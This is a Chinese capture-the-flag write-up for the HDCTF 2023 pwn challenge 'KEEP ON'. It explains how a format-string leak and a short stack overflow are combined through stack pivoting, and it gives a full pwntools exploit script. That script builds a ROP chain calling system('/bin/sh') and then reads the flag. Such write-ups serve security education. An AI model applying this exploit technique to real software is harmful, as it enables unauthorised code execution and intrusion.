栈迁移([HDCTF 2023]KEEP ON)

栈迁移

[HDCTF 2023KEEP ON | NSSCTF](https://www.nssctf.cn/problem/3774)

  1. 题目给了一个格式化字符串的漏洞,和一个栈溢出漏洞,但是栈溢出的位置有限,只能溢出到返回值的位置,这样构造的ROP链不能完全写入到栈上,需要进行栈迁移:

  2. 确定栈迁移的目标位置:输入数组s的首地址,首先利用而格式化字符串泄漏bp寄存器指向的栈上的数据(是函数调用者即vuln的栈低指针),根据该值可以确定与s首地址的偏移x,从而用 泄漏的数据-x 来覆盖bp处的值, 泄漏的数据-x 处即为新的栈空间。

    • 调试确定 格式化字符串泄漏数据的位置bp处值与s的偏移量 ,可以看到bp寄存器指向的位置在输出字符串中的 第16个 ,s的首地址(0x7fffffffddb0)与泄漏的值(0x7fffffffde10)之间的距离相差 0x60

  3. EXP,其中 target+40 是我们输入字符串 b'/bin/sh' 的地址,要放在 pop_rdi_ret 传参:

    python 复制代码
    from pwn import *    
    context(os='linux', arch='amd64', log_level='debug')
    p=remote('node4.anna.nssctf.cn',28697)
    
    #ROPgadget获取一些必要指令的地址
    leave_ret = 0x4007f2	#栈迁移使用
    pop_rdi_ret = 0x4008d3	#传参使用
    ret_addr = 0x4005b9		#栈平衡使用
    sys_addr = 0x4005E0		#挟制ip使用
    p.recvuntil(b'please show me your name: \n')
    
    #泄漏地址
    payload = b'%16$p'
    p.sendline(payload)
    p.recvuntil(b'hello,')
    target = eval(p.recv(14).decode())
    print(hex(target))
    p.recvuntil(b'keep on !\n')
    
    #计算栈迁移后的首地址
    target = target - 0x60
    payload = (b'aaaaaaaa'+p64(ret_addr)+p64(pop_rdi_ret)+p64(target+40)+p64(sys_addr)+b'/bin/sh').ljust(0x50,b'\x00')+p64(target)+p64(leave_ret)
    p.sendline(payload)
    p.sendline(b'cat flag.txt')
    p.interactive()
相关推荐
RainCity4 天前
Java Swing 自定义组件库分享(十二)
java·笔记·后端
LinXunFeng11 天前
Obsidian - 使用 Share Note 分享笔记并自部署
前端·笔记·github
闪闪发亮的小星星16 天前
高斯光以及高斯光公式解释
笔记
cqbzcsq16 天前
CellFlow虚拟细胞论文阅读
论文阅读·人工智能·笔记·学习·生物信息
阿米亚波16 天前
【Windows】QEMU 启动 openEuler aarch64/arm64 架构系统 + 离线软件源
linux·windows·经验分享·笔记·架构·arm
自传.16 天前
尚硅谷 Vibe Coding|第三章(1) Claude Code深度使用与进阶技巧 学习笔记
笔记·学习·尚硅谷·vibecoding
.千余16 天前
【C++】模板进阶全解:非类型参数|全特化|偏特化|分离编译完全指南
开发语言·c++·笔记·学习·其他
自传.16 天前
尚硅谷 Vibe Coding|第二章 AI编程工具生态 学习笔记
笔记·学习·ai编程·尚硅谷·vibe coding
秋波。未央16 天前
Java Agent 开发 · Day 1 学习笔记(含作业完整标准答案)
java·笔记·学习
中屹指纹浏览器16 天前
2026指纹浏览器字体指纹、字体渲染偏差检测与全维度虚拟字体池搭建方案
经验分享·笔记